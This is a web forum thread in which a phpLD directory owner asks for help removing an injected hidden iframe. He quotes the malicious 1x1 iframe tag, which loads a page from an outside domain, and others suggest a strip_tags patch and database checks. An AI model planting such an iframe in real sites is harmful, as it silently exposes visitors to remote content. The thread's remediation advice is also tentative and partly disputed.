ARGH!!! Need desperate help here! PHPLD directory

I use the free version of phpld on several of my directories.
Well, this morning something popped up on all those directories that should not be there.
I can not login in the admin page because of this.

It is a iframe that was inserted, but I can not find where or what page, or what template that iframe was inserted.

Go to http://www.hugedirectory.net
As it loads you will see in the bottom bar something else that will try to load.
Hit view source and at the very top is this iframe code:
<iframe width="1" height="1" src="http://step57. info/traff/index2.php" style="border: 0;"></iframe>

Anyone know where I need to go or what to do to eliminate this iframe?

Thank you.

 

Have you posted this in the phpld forums?

 

Yes, just posted there in the php forum and hopefully between here and there, someone can help me.

Driving me up the wall!
I have now had the fine pleasure of going through every darn page in the site through my cpanel hunting for this iframe code.

Checked and checked, no extra pages or files are shown on cpanel.
Meaning that all files and pages there are the ones I loaded up.

 

Joe, Send me some cpanel info, and I will take a look.

 

Sorry ..I saw this after the fact ..but I started to work on a fix for this here ..

http://forums.digitalpoint.com/showthread.php?p=1975194#post1975194

I do plan to make sure we get a fix that works and stop this IFRAM crap ..it is a huge problem and becoming very distructive to servers and webmasters. And yes I am infected. However, we are learing there tricks as we speak.

 

This happened to me. Somehow the Amazon affilate got in the admin area. Goto the PHPmyAdmin and you should see and fix it.

 

See if your version includes this fix

Open your submit.php file in your favorite editor and find these lines (on or around line 125):

    $data['LAST_CHECKED'] = gmdate('Y-m-d H:i:s');

    $data['DATE_ADDED'] = gmdate('Y-m-d H:i:s');

    $data['DATE_MODIFIED'] = gmdate('Y-m-d H:i:s');

Code (markup):

Insert these three new lines of code after them:

    $data['DESCRIPTION'] = strip_tags($data['DESCRIPTION']);

    $data['TITLE'] = strip_tags($data['TITLE']);

    $data['OWNER_NAME'] = strip_tags($data['OWNER_NAME']);

Code (markup):

 

I have a scritp that does it -- and changes the permission

 

How does this remove the exploit ..? This virus appends to all files it can write too.

 

I am actually not sure how the iframe code got there, and I don't know if this something caused by a weakness in phpLD code, but what I gave you above is one thing I thought you should check. I would suggest doing a global search of all your files and search for "iframe" or similar to see where the code is located.

 

I found the iframe(amazon affiliate code) that was residing in the admin/category and it truncated. I had help by viewing the source and went and look in the phpmyadmin.